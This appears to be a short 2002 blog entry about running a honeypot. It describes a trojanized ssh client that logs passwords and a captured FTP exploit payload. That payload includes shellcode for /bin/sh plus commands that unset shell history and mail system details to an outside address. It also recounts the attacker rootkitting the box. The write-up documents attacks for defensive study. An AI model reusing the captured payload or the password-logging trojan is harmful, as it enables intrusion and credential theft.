At this moment (July 31, 2002) my third honeypot has been running for some days. It's changed somewhat. First it was equipped with a 40GB harddrive, now it only has 4. First it had an 3com ISA networkcard, now it has a cheap-ass PCI thingy. The latter 'upgrade' was because I couldn't get RedHat7.1 stable with the 3com card. I have to admit I really didn't try hard though.

Not only the hardware and OS have changed. I hacked up the keylogger because it didn't work well. The first problem I encountered was that the logger didn't flush the outputfile; when the kiddos logged out, the buffered output was never written to disk. The second problem was that it crashed. The new version seems to work better, although it still has to be tested out 'in the field'. Not only did I fix the logger, I also trojanized 'ssh', the SSH-client. It now logs passwords to a 'hidden' file. Can come in handy :)

On Sunday Aug 11th, at 12:20 CEST, somebody connected to port 21 and sent some stuff down the pipe. This stuff included:

3F3jT'=Rh/D=XjTj(XjXRhn/shh//biRSunset HISTFILE;uname -a | mail xrecmsg@hotmail.com; mail xrecmsg@hotmail.com;exit

Now let's wait and see if someone checks his mail regularly.

Well, somebody did check his mail. The guy rootkitted my system and began scanning for vulnerable ftpd's right away. His rootkit broke 'ls' and 'find', which both segfaulted without giving any useful output. This would immediately arouse suspicion to any sysadmin, but this unknown kiddo didn't even notice it. Combined with the scanning he did I disconnected the system almost directly after the hack. He didn't do anything interesting with the system, so I never looked into it. Next time I will.